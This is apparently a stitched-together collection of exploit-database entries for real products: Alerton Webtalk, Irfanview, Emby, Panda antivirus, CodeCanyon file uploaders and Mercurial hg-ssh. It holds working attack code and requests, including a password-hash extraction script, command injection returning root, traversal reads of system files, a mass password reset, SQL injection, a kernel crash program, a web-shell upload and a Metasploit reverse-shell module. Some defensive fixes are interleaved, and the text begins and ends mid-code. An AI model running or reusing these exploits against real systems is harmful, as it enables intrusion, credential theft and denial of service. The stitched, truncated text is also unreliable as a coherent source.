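        print("refused:", p)
```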
            
'''
Security Issues in Alerton Webtalk
==================================

Introduction
------------

Vulnerabilities were identified in the Alerton Webtalk Software supplied by
Alerton.  This software is used for the management of building automation
systems.  These were discovered during a black box assessment and therefore
the vulnerability list should not be considered exhaustive.  Alerton has
responded that Webtalk is EOL and past the end of its support period.  Customers
should move to newer products available from Alerton.  Thanks to Alerton for prompt
replies in communicating with us about these issues.

Versions 2.5 and 3.3 were both confirmed to be affected by these issues.

Webtalk-01 - Password Hashes Accessible to Unauthenticated Users
----------------------------------------------------------------

Severity: **High**

Password hashes for all of the users configured in Alerton Webtalk are
accessible via a file in the document root of the ‘webtalk’ user.  The
location of this file is configuration dependent; however, the configuration
file is accessible as well (at a static location, /~webtalk/webtalk.ini).  The
password database is a sqlite3 database whose name is based on the bacnet rep
and job entries from the ini file.

A python proof of concept to reproduce this issue is in an appendix.

Recommendation: Do not store sensitive data within areas being served by the
webserver.

Webtalk-02 - Command Injection for Authenticated Webtalk Users
--------------------------------------------------------------

Severity: **High**

Any user granted the “configure webtalk” permission can execute commands as
the root user on the underlying server.  There appears to be some effort of
filtering command strings (such as rejecting commands containing pipes and
redirection operators) but this is inadequate.  Using this vulnerability, an
attacker can add an SSH key to the root user’s authorized_keys file.

GET
/~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True
HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801

...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...


Recommendation: Avoid passing user input to shell commands.  If this is
not possible, shell arguments must be properly escaped.  Consider using one of
the functions from the subprocess module without the shell=True parameter.

Webtalk-03 - Cross-Site Request Forgery
---------------------------------------

Severity: **High**

The entire Webtalk administrative interface lacks any controls against
Cross-Site Request Forgery.  This allows an attacker to execute
administrative changes without access to valid credentials.  Combined with the above
vulnerability, this allows an attacker to gain root access without any
credentials.

Recommendation: Implement CSRF tokens on all state-changing actions.

Webtalk-04 - Insecure Credential Hashing
----------------------------------------

Severity: **Moderate**

Password hashes in the userprofile.db database are computed by concatenating
the password with the username (e.g., PASSUSER) and applying a plain MD5
hash.  No salting or iterative hashing is performed.  This does not follow
password hashing best practices and makes offline attacks highly practical.

Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.

Webtalk-05 - Login Flow Defeats Password Hashing
------------------------------------------------

Severity: **Moderate**

Password hashing is performed on the client side, allowing for the replay of
password hashes from Webtalk-01.  While this only works on the mobile login
interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting
session is able to access all resources and is functionally equivalent to a login
through the Java-based login flow.

Recommendation: Perform hashing on the server side and use TLS to protect
secrets in transit.


Timeline
--------

2017/01/?? - Issues Discovered
2017/01/26 - Issues Reported to security@honeywell.com
2017/01/30 - Initial response from Alerton confirming receipt.
2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
2017/04/26 - This disclosure

Discovery
---------

These issues were discovered by David Tomaschik of the Google ISA
Assessments team.

Appendix A: Script to Extract Hashes
------------------------------------
'''

import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os


def get_webtalk_ini(base_url):
    """Get the webtalk.ini file and parse it."""
    url = '%s/~webtalk/webtalk.ini' % base_url
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get webtalk.ini: %s', url)
    buf = StringIO.StringIO(r.text)
    parser = ConfigParser.RawConfigParser()
    parser.readfp(buf)
    return parser


def get_db_path(base_url, config):
    rep = config.get('bacnet', 'rep')
    job = config.get('bacnet', 'job')
    url = '%s/~webtalk/bts/%s/%s/userprofile.db'
    return url % (base_url, rep, job)


def load_db(url):
    """Load and read the db."""
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get %s.' % url)
    tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
    tmpf = os.fdopen(tmpfd, 'w')
    tmpf.write(r.content)
    tmpf.close()
    con = sqlite3.connect(tmpname)
    cur = con.cursor()
    cur.execute("SELECT UserID, UserPassword FROM tblPassword")
    results = cur.fetchall()
    con.close()
    os.unlink(tmpname)
    return results


def users_for_server(base_url):
    if '://' not in base_url:
        base_url = 'http://%s' % base_url
    ini = get_webtalk_ini(base_url)
    db_path = get_db_path(base_url, ini)
    return load_db(db_path)


if __name__ == '__main__':
    for host in sys.argv[1:]:
        try:
            users = users_for_server(host)
        except Exception as ex:
            sys.stderr.write('%s\n' % str(ex))
            continue
        for u in users:
            print '%s:%s' % (u[0], u[1])
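Webtalk-04 and Webtalk-05 above describe the scheme md5(password + username), computed on the client and so replayable straight from a dumped userprofile.db. As an added example, not Webtalk or Google code, the following Python 3 snippet shows that scheme beside a server-side replacement using a per-user random salt, scrypt and constant-time comparison; the record format and the scrypt parameters are assumptions of the example (hashlib.scrypt needs an OpenSSL build with scrypt support).

```python
import hashlib
import hmac
import os

# scrypt work factors; assumed values for the example (128 * n * r = 16 MiB of memory).
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1
SCRYPT_MAXMEM = 64 * 1024 * 1024


def webtalk_hash(password, username):
    """The Webtalk-04 scheme: plain MD5 over PASSUSER, no salt, no iteration.

    The same password+username pair always gives the same digest, so digests
    pulled from userprofile.db can be cracked offline with a wordlist and, because
    the client computes this value itself (Webtalk-05), replayed as-is.
    """
    return hashlib.md5((password + username).encode("utf-8")).hexdigest()


def make_record(password):
    """Server-side record: random 16-byte salt, scrypt-derived 32-byte key.

    Record format (an assumption of this example): scrypt$N$r$p$salt_hex$key_hex
    """
    salt = os.urandom(16)
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P,
                         maxmem=SCRYPT_MAXMEM, dklen=32)
    return "scrypt$%d$%d$%d$%s$%s" % (SCRYPT_N, SCRYPT_R, SCRYPT_P, salt.hex(), key.hex())


def verify_record(record, password):
    """Recompute from the password the client sent (over TLS), never from a
    client-supplied digest; compare in constant time."""
    parts = record.split("$")
    if len(parts) != 6 or parts[0] != "scrypt":
        return False
    try:
        n, r, p = (int(x) for x in parts[1:4])
        salt, key = bytes.fromhex(parts[4]), bytes.fromhex(parts[5])
        candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p,
                                   maxmem=SCRYPT_MAXMEM, dklen=len(key))
    except ValueError:          # malformed record or unacceptable parameters
        return False
    return hmac.compare_digest(candidate, key)


if __name__ == "__main__":
    print("webtalk-style:", webtalk_hash("secret", "admin"), "(identical on every install)")
    rec = make_record("secret")
    print("salted record:", rec)
    print("verify ok:", verify_record(rec, "secret"), "wrong pw:", verify_record(rec, "Secret"))
```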
            
# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)


#POC

#!/usr/bin/env python

eip = "\xf7\x56\x44\x7e"  # jmp esp from user32.dll

buffer = "OtherExtensions=" + "A" * 199 + eip + "\xcc"

print buffer  # a) irfanview->Option->Properties/Settings->Extensions
              # b) Paste the buffer in the "other" input then press ok, repeat a) and b)





#bad characters: those instructions that start with 6,7,8,E,F
#Only 43 bytes of space to host shellcode, and lots of bad chars make this hard to exploit
#Any other way around this?
            
Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability


Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
                  3.1.5
                  3.1.2
                  3.1.1
                  3.1.0
                  3.0.0

Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.

Desc: The vulnerability was confirmed on the tested platforms depending on the version:
version 3.1.0 is affected on Linux, Windows and Mac, while 3.2.5 is affected only in the
Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not
properly verified before being used to load resources. This can be exploited to disclose
the contents of arbitrary files via directory traversal attacks.

================================================================================
/Emby.Server.Implementations/HttpServer/SwaggerService.cs:
----------------------------------------------------------

using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;

namespace Emby.Server.Implementations.HttpServer
{
    public class SwaggerService : IService, IRequiresRequest
    {
        private readonly IServerApplicationPaths _appPaths;
        private readonly IFileSystem _fileSystem;

        public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
        {
            _appPaths = appPaths;
            _fileSystem = fileSystem;
            _resultFactory = resultFactory;
        }

        /// <summary>
        /// Gets the specified request.
        /// </summary>
        /// <param name="request">The request.</param>
        /// <returns>System.Object.</returns>
        public object Get(GetSwaggerResource request)
        {
            var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");

            var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));

            return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
        }

        /// <summary>
        /// Gets or sets the result factory.
        /// </summary>
        /// <value>The result factory.</value>
        private readonly IHttpResultFactory _resultFactory;

        /// <summary>
        /// Gets or sets the request context.
        /// </summary>
        /// <value>The request context.</value>
        public IRequest Request { get; set; }
    }
}

================================================================================
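The SwaggerService listing above joins the request's resource name onto the swagger-ui directory without normalising it. The following is an added example (not Emby's code; the base directory and sample names are constructed) that models that join next to a hardened resolver which decodes once, rejects ".." and absolute segments in either separator style, and checks containment of the final path.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical resources root standing in for Emby's "swagger-ui" directory
# (constructed for this example; the real path is installation-specific).
SWAGGER_DIR = "/opt/emby/resources/swagger-ui"


def vulnerable_join(base_dir, resource_name):
    """Model of the SwaggerService logic: Path.Combine(base, name.Replace('/', sep)).

    The HTTP layer has already percent-decoded the name, and Path.Combine
    neither rejects '..' segments nor checks containment, so normalising the
    result shows where the OS will actually look.
    """
    name = unquote(resource_name).replace("\\", "/")
    return posixpath.normpath(posixpath.join(base_dir, name))


def safe_join(base_dir, resource_name):
    """Resolve resource_name under base_dir, or raise ValueError.

    Decodes once, treats both separator styles as separators, rejects
    absolute names, '..' segments and stray characters, and finally checks
    that the normalised result is still inside base_dir.
    """
    decoded = unquote(resource_name)
    if "%" in decoded:
        # A second layer of encoding is never legitimate for a static asset name.
        raise ValueError("double-encoded resource name")
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):
        raise ValueError("absolute resource name")
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if not segments:
        raise ValueError("empty resource name")
    if any(s == ".." or ":" in s or "\x00" in s for s in segments):
        raise ValueError("path traversal or illegal character in resource name")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, *segments))
    # Containment check as a last line of defence, independent of the filters above.
    if not candidate.startswith(base + "/"):
        raise ValueError("resolved path escapes base directory")
    return candidate


def accepted(base_dir, resource_name):
    """True when safe_join accepts the name, False when it rejects it."""
    try:
        safe_join(base_dir, resource_name)
        return True
    except ValueError:
        return False


# Constructed sample names: benign assets plus the two traversal shapes shown in
# the advisory (backslashes on Windows, percent-encoded slashes on Linux).
SAMPLE_NAMES = [
    "index.html",
    "css/style.css",
    "..\\..\\..\\..\\windows\\win.ini",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "/etc/passwd",
    "%252e%252e/index.html",
]

if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        print("%-36r -> combine: %-45s accepted: %s"
              % (name, vulnerable_join(SWAGGER_DIR, name), accepted(SWAGGER_DIR, name)))
```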


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
           Ubuntu Linux 14.04.5
           MacOS Sierra 10.12.3
           SQLite3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5403
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098


22.12.2016

--


GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1

HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

==========================

On Linux:

http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...
            
Emby MediaServer 3.2.5 Password Reset Vulnerability


Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
                  3.1.5
                  3.1.2
                  3.1.1
                  3.1.0
                  3.0.0

Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.

Desc: The issue can be triggered only by an unauthenticated actor within the home network
(LAN). The attacker doesn't need to specify a valid username to reset the password: any
random string can be entered, and the file disclosure issue can then be used to read the
PIN needed for the reset. This in turn discloses all the valid usernames on the Emby server
and resets the passwords of all users to a blank password. Attackers can exploit this to
gain unauthenticated and unauthorized access to the Emby media server management interface.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
           Ubuntu Linux 14.04.5
           MacOS Sierra 10.12.3
           SQLite3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098


22.12.2016

--


1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------

http://10.211.55.3:8096/web/forgotpassword.html


2. Then, we type any random username and hit submit:
----------------------------------------------------

POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1

EnteredUsername=RandomusUsuarius



3. You will get an alert message (Windows/Linux):
-------------------------------------------------

The following file has been created on your server and contains instructions on how to proceed:

C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt

-- OR --

/var/lib/emby-server/passwordreset.txt


4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------

GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close

HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close

Use your web browser to visit:

http://10.211.55.3:8096/web/forgotpasswordpin.html

Enter the following pin code:

6727

The pin code will expire at 91



5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
-----------------------------------------------------------------------------------------------------------------------------

POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1

Pin=6272

---

We get the message:

Passwords have been removed for the following users. To login, sign in with a blank password.

testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na
            
Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability


Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
                  3.1.5
                  3.1.2
                  3.1.1
                  3.1.0
                  3.0.0

Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.

Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET
parameter 'MediaTypes' is not properly sanitised before being returned to the user
or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
           Ubuntu Linux 14.04.5
           MacOS Sierra 10.12.3
           SQLite3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5400
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098


22.12.2016

--


PoC:

GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
Host: 10.211.55.3:8096
accept: application/json
x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close

Response:

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Mono-HTTPAPI/1.0
Date: Tue, 21 Feb 2017 12:06:09 GMT
Content-Length: 64
Connection: close

Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.
            
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>


#define DEVICE_NAME L"\\\\.\\PSMEMDriver"

LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
	HANDLE hFile = NULL;

	hFile = CreateFile(FileName,
		GENERIC_READ | GENERIC_WRITE,
		0,
		0,
		OPEN_EXISTING,
		NULL,
		0);

	return hFile;
}

int main()
{

	HANDLE hFile = NULL;
	PVOID64 lpInBuffer = NULL;
	DWORD lpBytesReturned = 0;   // DeviceIoControl expects an LPDWORD, not a ULONG64*
	PVOID64 BuffAddress = NULL;
	SIZE_T BufferSize = 0x800;
	
	printf("Trying to get the handle for the PSMEMDriver device.\r\n");
	
	hFile = GetDeviceHandle(FileName);

	if (hFile == INVALID_HANDLE_VALUE) {
		printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
		return 1;
	}

	// Allocate memory for our buffer
	lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	

	if (lpInBuffer == NULL) {
		printf("VirtualAlloc() failed. \r\n");
		return 1;
	}
	

	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
	*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
	*(PULONG64)BuffAddress = (ULONG64)0x42424242;
	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
	
	RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);



	DeviceIoControl(hFile,
		0xb3702c38,
		lpInBuffer,
		NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
		NULL,
		NULL,
		&lpBytesReturned,
		NULL);

	/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
	printf("Cleaning up.\r\n");
	VirtualFree((LPVOID)lpInBuffer, 0, MEM_RELEASE);   // dwSize must be 0 with MEM_RELEASE
	CloseHandle(hFile);
	printf("Resources freed up.\r\n");
    return 0;
}
            
# Exploit Title: Easy File Uploader  - Arbitrary File Upload
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team


POC

Upload a PHP file (shell.php).
Then access http://poc_site/fileFolder/shell.php and enjoy!
            
# Exploit Title: Simple File Uploader - Arbitrary File Download 
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team




POC

#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear') 

BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"

def banner():
	print WHITE+""
	print "                                              ##          ## "
	print "                                                ##      ##    "     
	print "                                              ############## "
	print "                                            ####  ######  #### "
	print "                                          ###################### "
	print "                                          ##  ##############  ##     "
	print "                                          ##  ##          ##  ## "
	print "                                                ####  ####"
	print ""

def details():
	print WHITE+"                              =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
	print ""

def core_commands():
	os.system('clear')
	print WHITE+'''Core Commands\n===============\n
Command\t\t\tDescription\n-------\t\t\t-----------\n
?\t\t\tHelp menu
quit\t\t\tExit the console
info\t\t\tDisplay information
download\t\t\tExploit Vulnerability

	'''

def about():
	os.system('clear')
	print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
Author\t\t\tDescription\n-------\t\t\t-----------\n
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
	'''

def download():
	other = 'a'
	while other != 'n':
			urltarget = str(raw_input(WHITE+'Target: '))
			filename =  str(raw_input(WHITE+'FileName: '))
			filename =  base64.b64encode(filename)
			print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
			final = urltarget+'download.php?id='+filename
			r = requests.get(final)
			print r.text
			other = str(raw_input(WHITE+'Test other file? y/n: '))
			if other == "n":
				print "Type quit to exit. Bye!"



banner()
details()

option='0'
while option != 0:
	option = (raw_input(RED+"pwn" + WHITE +" > "))
	if option == "quit":
		os.system('clear')
		option = 0
	elif option == "?":
		core_commands()
	elif option == "help":
		core_commands()
	elif option == "about":
		about()
	elif option == "download":
		download()
	elif option == "info":
		about()
	else:
		print "Not a valid option! Need help? Press ? to display core commands " +GREEN
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
      'Description'    => %q{
        This module takes advantage of custom hg-ssh wrapper implementations that don't
        adequately validate parameters passed to the hg binary, allowing users to trigger a
        Python Debugger session, which allows arbitrary Python code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'claudijd',
        ],
      'References'     =>
        [
          ['URL',   'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
        ],
      'DefaultOptions' =>
        {
          'Payload' => 'python/meterpreter/reverse_tcp',
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [ ['Automatic', {}] ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 18 2017",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22),
        OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
        OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
      ]
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def username
    datastore['USERNAME']
  end

  def ssh_priv_key
    File.read(datastore['SSH_PRIV_KEY_FILE'])
  end

  def exploit
    factory = ssh_socket_factory
    ssh_options = {
      auth_methods: ['publickey'],
      config: false,
      use_agent: false,
      key_data: [ ssh_priv_key ],
      port: rport,
      proxy: factory,
      non_interactive:  true
    }

    ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    print_status("#{rhost}:#{rport} - Attempting to login...")

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, username, ssh_options)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      print_good("SSH connection is established.")
      ssh.open_channel do |ch|
        ch.exec "hg -R --debugger serve --stdio" do |ch, success|
          ch.on_extended_data do |ch, type, data|
            if data.match(/entering debugger/)
